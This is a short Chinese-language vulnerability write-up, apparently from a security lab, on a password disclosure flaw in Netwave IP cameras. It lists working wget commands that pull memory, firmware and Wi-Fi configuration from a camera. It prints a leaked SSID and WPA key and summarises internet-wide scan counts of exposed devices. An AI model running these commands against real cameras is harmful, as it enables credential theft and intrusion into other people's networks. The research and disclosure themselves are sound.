Author:MyKings(知道创宇404实验室)
看到 exploit-db.com 中报了一个《Netwave IP Camera - Password Disclosure》漏洞, 这个漏洞包含了wifi密码与Web的账号泄露。
顺便使用了 zoomeye 搜索了下全球的这款网络摄像头, 发现用这个还挺多的。
wget -qO- http://[HOST]:[PORT]//proc/kcore | strings
wget -qO- http://[HOST]:[PORT]//etc/RT2870STA.dat
wget -qO- http://[HOST]:[PORT]//dev/rom0
wget -qO- http://[HOST]:[PORT]/get_status.cgi
会泄露当前网络摄像头的一些配置信息:
var sys_ver='21.37.2.47'; var app_ver='0.0.4.19'; var alias='002voam'; var now=1486976881; var tz=-28800; var alarm_status=0; var ddns_status=0; var ddns_host=''; var oray_type=0; var upnp_status=0; var p2p_status=0; var p2p_local_port=20409; var msn_status=0; var wifi_status=0; var temperature=0.0; var humidity=0; var tridro_error='';
这里文件就是一个配置文件, 这里可以得到SSID
与wifi
密码。
[Default]
SSID=hang yue office
NetworkType=Infra
Channel=0
AuthMode=WPA2PSK
EncrypType=AES
WPAPSK=hangyuewifi
内存的map
, 可以直接使用wget
下载下来(需要注意这里要把wget进程结束才可以登录)。
先来看一张使用 ZoomEye
搜索的结果, 可以看到搜索到 315,129
条。
通过筛选分析后 11186
IP中存在包含wifi密码, 其中覆盖了111个国家和地区。
这里近分析了中国香港地区的摄像头:
密码类型统计
密码用的最多TOP 10
密码长度统计
看的出大众还是使用8位、10位的密码较多。
附上一张香港分析后的图, 红色代表没有密码的wifi, 黄色代表WEP加密方式, 蓝色代表WPAPSK方式。
这个世界范围内存在摄像头密码泄漏的分布图。
这张图示是根据SSID搜索到的一家公司内的IP摄像头截图。